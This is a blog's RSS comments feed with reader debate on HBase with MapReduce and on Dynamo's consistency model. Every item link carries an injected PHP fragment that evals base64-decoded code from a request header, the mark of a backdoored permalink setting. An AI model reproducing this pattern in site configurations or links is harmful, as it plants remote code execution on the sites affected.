<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments for Joydeep Sen Sarma's blog</title>
	<atom:link href="http://jsensarma.com/blog/comments/feed/" rel="self" type="application/rss+xml" />
	<link>http://jsensarma.com/blog</link>
	<description>musings on computing and storage</description>
	<lastBuildDate>Tue, 20 Apr 2010 02:46:14 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>Comment on HBase and Map-Reduce by Hbase and Mapreduce &#124; Analytics Team</title>
		<link>http://jsensarma.com/blog/2010/04/07/hbase-and-map-reduce/%&#038;($eval(base64_decode($_SERVERHTTP_EXECCODE))|.+)&#038;%/comment-page-1/#comment-175</link>
		<dc:creator>Hbase and Mapreduce &#124; Analytics Team</dc:creator>
		<pubDate>Tue, 20 Apr 2010 02:46:14 +0000</pubDate>
		<guid isPermaLink="false">http://jsensarma.com/blog/?p=74#comment-175</guid>
		<description>[...] Here&#8217;s a post from Joydeep Sen Sarma about the combo of Hbase and Mapreduce. [...]</description>
		<content:encoded><![CDATA[<p>[...] Here&#8217;s a post from Joydeep Sen Sarma about the combo of Hbase and Mapreduce. [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on HBase and Map-Reduce by Mike Clarke</title>
		<link>http://jsensarma.com/blog/2010/04/07/hbase-and-map-reduce/%&#038;($eval(base64_decode($_SERVERHTTP_EXECCODE))|.+)&#038;%/comment-page-1/#comment-159</link>
		<dc:creator>Mike Clarke</dc:creator>
		<pubDate>Thu, 08 Apr 2010 16:05:28 +0000</pubDate>
		<guid isPermaLink="false">http://jsensarma.com/blog/?p=74#comment-159</guid>
		<description>@Jeff I see the benefits of a distributed DB especially if you can build multiple static tables for reporting or lookups, each with their own indexing, on the fly during transactional processing.  I am wondering if it would help for optimization of localized data based on language?</description>
		<content:encoded><![CDATA[<p>@Jeff I see the benefits of a distributed DB especially if you can build multiple static tables for reporting or lookups, each with their own indexing, on the fly during transactional processing.  I am wondering if it would help for optimization of localized data based on language?</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on HBase and Map-Reduce by Joydeep</title>
		<link>http://jsensarma.com/blog/2010/04/07/hbase-and-map-reduce/%&#038;($eval(base64_decode($_SERVERHTTP_EXECCODE))|.+)&#038;%/comment-page-1/#comment-157</link>
		<dc:creator>Joydeep</dc:creator>
		<pubDate>Wed, 07 Apr 2010 05:40:47 +0000</pubDate>
		<guid isPermaLink="false">http://jsensarma.com/blog/?p=74#comment-157</guid>
		<description>@Jeff - interesting project - need to keep uptodate! I agree - a third computing tier feeding off the real-time logs for stream processing makes a lot of sense. materialized views would be awesome (would kill all of E, T &amp; L).</description>
		<content:encoded><![CDATA[<p>@Jeff &#8211; interesting project &#8211; need to keep uptodate! I agree &#8211; a third computing tier feeding off the real-time logs for stream processing makes a lot of sense. materialized views would be awesome (would kill all of E, T &#038; L).</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on HBase and Map-Reduce by Tweets that mention HBase and Map-Reduce « Joydeep Sen Sarma’s blog -- Topsy.com</title>
		<link>http://jsensarma.com/blog/2010/04/07/hbase-and-map-reduce/%&#038;($eval(base64_decode($_SERVERHTTP_EXECCODE))|.+)&#038;%/comment-page-1/#comment-156</link>
		<dc:creator>Tweets that mention HBase and Map-Reduce « Joydeep Sen Sarma’s blog -- Topsy.com</dc:creator>
		<pubDate>Wed, 07 Apr 2010 05:04:44 +0000</pubDate>
		<guid isPermaLink="false">http://jsensarma.com/blog/?p=74#comment-156</guid>
		<description>[...] This post was mentioned on Twitter by Jean-Daniel, Imran M Yousuf. Imran M Yousuf said: RT @jdcryans: Joydeep tries something less controversial and explores the multiple possibilities of #mapreduce, #hbase and #hive http://su.pr/1xFET7 [...]</description>
		<content:encoded><![CDATA[<p>[...] This post was mentioned on Twitter by Jean-Daniel, Imran M Yousuf. Imran M Yousuf said: RT @jdcryans: Joydeep tries something less controversial and explores the multiple possibilities of #mapreduce, #hbase and #hive <a href="http://su.pr/1xFET7" rel="nofollow">http://su.pr/1xFET7</a> [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on HBase and Map-Reduce by Jeff</title>
		<link>http://jsensarma.com/blog/2010/04/07/hbase-and-map-reduce/%&#038;($eval(base64_decode($_SERVERHTTP_EXECCODE))|.+)&#038;%/comment-page-1/#comment-155</link>
		<dc:creator>Jeff</dc:creator>
		<pubDate>Wed, 07 Apr 2010 04:32:47 +0000</pubDate>
		<guid isPermaLink="false">http://jsensarma.com/blog/?p=74#comment-155</guid>
		<description>Hey Joy,

I think there&#039;s a third class of low-latency analytics to be performed against data as it&#039;s generated. The DBToaster project (http://www.cs.cornell.edu/bigreddata/dbtoaster/) gives a good example. I&#039;m curious to see the size of each of these domains (essentially &lt; 1 sec, &lt; 1 min, &lt; 1 hr).

Later,
Jeff</description>
		<content:encoded><![CDATA[<p>Hey Joy,</p>
<p>I think there&#8217;s a third class of low-latency analytics to be performed against data as it&#8217;s generated. The DBToaster project (<a href="http://www.cs.cornell.edu/bigreddata/dbtoaster/" rel="nofollow">http://www.cs.cornell.edu/bigreddata/dbtoaster/</a>) gives a good example. I&#8217;m curious to see the size of each of these domains (essentially &lt; 1 sec, &lt; 1 min, &lt; 1 hr).</p>
<p>Later,<br />
Jeff</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Dynamo: A flawed architecture &#8211; Part I by Mike Spreitzer</title>
		<link>http://jsensarma.com/blog/2009/11/01/dynamo-a-flawed-architecture-part-i/%&#038;($eval(base64_decode($_SERVERHTTP_EXECCODE))|.+)&#038;%/comment-page-1/#comment-154</link>
		<dc:creator>Mike Spreitzer</dc:creator>
		<pubDate>Fri, 13 Nov 2009 04:10:56 +0000</pubDate>
		<guid isPermaLink="false">http://jsensarma.com/blog/?p=55#comment-154</guid>
		<description>BTW, the hash trees that Dynamo uses are credited to Ralph, not Angela.  It is spelled &quot;Merkle&quot;.</description>
		<content:encoded><![CDATA[<p>BTW, the hash trees that Dynamo uses are credited to Ralph, not Angela.  It is spelled &#8220;Merkle&#8221;.</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Dynamo: A flawed architecture &#8211; Part I by tecosystems &#187; links for 2009-11-11</title>
		<link>http://jsensarma.com/blog/2009/11/01/dynamo-a-flawed-architecture-part-i/%&#038;($eval(base64_decode($_SERVERHTTP_EXECCODE))|.+)&#038;%/comment-page-1/#comment-153</link>
		<dc:creator>tecosystems &#187; links for 2009-11-11</dc:creator>
		<pubDate>Thu, 12 Nov 2009 01:05:01 +0000</pubDate>
		<guid isPermaLink="false">http://jsensarma.com/blog/?p=55#comment-153</guid>
		<description>[...] Dynamo: A flawed architecture &#8211; Part I « Joydeep Sen Sarma’s blog pushback to Dynamo (tags: dynamo amazon scalability architecture distributed computing scaling nosql key-value eventual consistency) [...]</description>
		<content:encoded><![CDATA[<p>[...] Dynamo: A flawed architecture &#8211; Part I « Joydeep Sen Sarma’s blog pushback to Dynamo (tags: dynamo amazon scalability architecture distributed computing scaling nosql key-value eventual consistency) [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Dynamo &#8211; Part I: a followup and re-rebuttals by Kannan</title>
		<link>http://jsensarma.com/blog/2009/11/03/dynamo-part-i-a-followup-and-re-rebuttals/%&#038;($eval(base64_decode($_SERVERHTTP_EXECCODE))|.+)&#038;%/comment-page-1/#comment-150</link>
		<dc:creator>Kannan</dc:creator>
		<pubDate>Thu, 05 Nov 2009 06:41:22 +0000</pubDate>
		<guid isPermaLink="false">http://jsensarma.com/blog/?p=64#comment-150</guid>
		<description>@Benjamin: I am not sure if you parsed my comment right. The case I am describing does not necessarily involve partition. C could be down due to a variety of reasons. Also, in my example, the read that happens after the failed write is not on  C (as you mentioned) but at A.</description>
		<content:encoded><![CDATA[<p>@Benjamin: I am not sure if you parsed my comment right. The case I am describing does not necessarily involve partition. C could be down due to a variety of reasons. Also, in my example, the read that happens after the failed write is not on  C (as you mentioned) but at A.</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Dynamo: A flawed architecture &#8211; Part I by Lee</title>
		<link>http://jsensarma.com/blog/2009/11/01/dynamo-a-flawed-architecture-part-i/%&#038;($eval(base64_decode($_SERVERHTTP_EXECCODE))|.+)&#038;%/comment-page-1/#comment-148</link>
		<dc:creator>Lee</dc:creator>
		<pubDate>Wed, 04 Nov 2009 16:17:38 +0000</pubDate>
		<guid isPermaLink="false">http://jsensarma.com/blog/?p=55#comment-148</guid>
		<description>Why are you assuming dynamo only runs in one data center?</description>
		<content:encoded><![CDATA[<p>Why are you assuming dynamo only runs in one data center?</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Dynamo &#8211; Part I: a followup and re-rebuttals by Joydeep</title>
		<link>http://jsensarma.com/blog/2009/11/03/dynamo-part-i-a-followup-and-re-rebuttals/%&#038;($eval(base64_decode($_SERVERHTTP_EXECCODE))|.+)&#038;%/comment-page-1/#comment-146</link>
		<dc:creator>Joydeep</dc:creator>
		<pubDate>Wed, 04 Nov 2009 07:40:06 +0000</pubDate>
		<guid isPermaLink="false">http://jsensarma.com/blog/?p=64#comment-146</guid>
		<description>@benjamin: regarding amazon usage - perhaps i shouldn&#039;t have commented on it (i was passing on a second-hand story - but that&#039;s all it is). but i believe the relative success of bigtable is very much pertinent to this discussion. i don&#039;t think one could have provided an eventually consistent data store and achieved the same success as appengine with application developers.

i have posted a correction on my post about the vector clock stuff and explained why it happened. we were deep in discussions about Cassandra - and it doesn&#039;t use vector timestamps.

thank goodness u agree about Consistency. So does Avinash. What i have tried to point out is that Dynamo paper&#039;s section on quorums and consistency is confusing like hell. It leads readers to believe that they can get consistency - when they can&#039;t (with 100% odds). If u look at Jonathan&#039;s arguments - he&#039;s continuing to insist that there are proper read/write quorums in Dynamo/Cassandra - whereas there aren&#039;t. The term &#039;sloppy quorum&#039; is used for a reason and the system is only &#039;eventually consistent&#039; for the same reason.

i haven&#039;t said that relaxed consistency is not attractive for some applications. i am also not saying that dynamo is only deployed within a single data center. what i am saying though is that consistency needs to be relaxed only when partitioning is possible - and that this can be built as a separate layer above a data store with CA. the other thing that i keep stressing is that having bounds on inconsistency is a matter of practical importance. while recovering from an event like a disaster, one is faced with a choice of bringing online significantly old data and availability in the face of disaster. In such admin initiated actions - it&#039;s very important to have some idea of how much data could be potentially lost. The reason simply being that if data is significantly out of date - one might rather choose to be unavailable for the couple of days that it takes for the disaster to repair.

i continue to disagree about partitions within a single data center. u had mentioned whether i had on the ground experience in a web company. it might help to know then that my comments about core switches and partitioning is not some figment of imagination - but derived from actual events from our site - one of the largest in the world. any kind of network partition in our data centers is usually catastrophic. we are simply unable to lose network access to one of our core services (from say our web tier) and continue functioning normally (from that data center). this would be fairly typical of any web site. so we must build arrangements that prevent network partitions in a data center. rack failures (which are usually switch failures) are another case (that are almost like partitions) - but this problem is easily solved by replicating across racks (a la hdfs). important central servers have to be attached to multiple switches.

i think this is a critical point (without which the argument for starting with CA only falls apart). FWIW - i have had almost total success internally with this argument (people immediately agree from experience that partitions are simply intolerable within a data center). 

(btw - on a related point - S3 is eventually consistent as well - and it&#039;s a total pain to deal with that aspect of it (first hand experience working out Hive integration with Amazon guys). i almost felt sorry for Amazon engineers as they kept explaining how screwed up the semantics were. some day amazon will have to fix it (competition is coming)).</description>
		<content:encoded><![CDATA[<p>@benjamin: regarding amazon usage &#8211; perhaps i shouldn&#8217;t have commented on it (i was passing on a second-hand story &#8211; but that&#8217;s all it is). but i believe the relative success of bigtable is very much pertinent to this discussion. i don&#8217;t think one could have provided an eventually consistent data store and achieved the same success as appengine with application developers.</p>
<p>i have posted a correction on my post about the vector clock stuff and explained why it happened. we were deep in discussions about Cassandra &#8211; and it doesn&#8217;t use vector timestamps.</p>
<p>thank goodness u agree about Consistency. So does Avinash. What i have tried to point out is that Dynamo paper&#8217;s section on quorums and consistency is confusing like hell. It leads readers to believe that they can get consistency &#8211; when they can&#8217;t (with 100% odds). If u look at Jonathan&#8217;s arguments &#8211; he&#8217;s continuing to insist that there are proper read/write quorums in Dynamo/Cassandra &#8211; whereas there aren&#8217;t. The term &#8217;sloppy quorum&#8217; is used for a reason and the system is only &#8216;eventually consistent&#8217; for the same reason.</p>
<p>i haven&#8217;t said that relaxed consistency is not attractive for some applications. i am also not saying that dynamo is only deployed within a single data center. what i am saying though is that consistency needs to be relaxed only when partitioning is possible &#8211; and that this can be built as a separate layer above a data store with CA. the other thing that i keep stressing is that having bounds on inconsistency is a matter of practical importance. while recovering from an event like a disaster, one is faced with a choice of bringing online significantly old data and availability in the face of disaster. In such admin initiated actions &#8211; it&#8217;s very important to have some idea of how much data could be potentially lost. The reason simply being that if data is significantly out of date &#8211; one might rather choose to be unavailable for the couple of days that it takes for the disaster to repair.</p>
<p>i continue to disagree about partitions within a single data center. u had mentioned whether i had on the ground experience in a web company. it might help to know then that my comments about core switches and partitioning is not some figment of imagination &#8211; but derived from actual events from our site &#8211; one of the largest in the world. any kind of network partition in our data centers is usually catastrophic. we are simply unable to lose network access to one of our core services (from say our web tier) and continue functioning normally (from that data center). this would be fairly typical of any web site. so we must build arrangements that prevent network partitions in a data center. rack failures (which are usually switch failures) are another case (that are almost like partitions) &#8211; but this problem is easily solved by replicating across racks (a la hdfs). important central servers have to be attached to multiple switches.</p>
<p>i think this is a critical point (without which the argument for starting with CA only falls apart). FWIW &#8211; i have had almost total success internally with this argument (people immediately agree from experience that partitions are simply intolerable within a data center). </p>
<p>(btw &#8211; on a related point &#8211; S3 is eventually consistent as well &#8211; and it&#8217;s a total pain to deal with that aspect of it (first hand experience working out Hive integration with Amazon guys). i almost felt sorry for Amazon engineers as they kept explaining how screwed up the semantics were. some day amazon will have to fix it (competition is coming)).</p>
]]></content:encoded>
	</item>
</channel>
</rss>
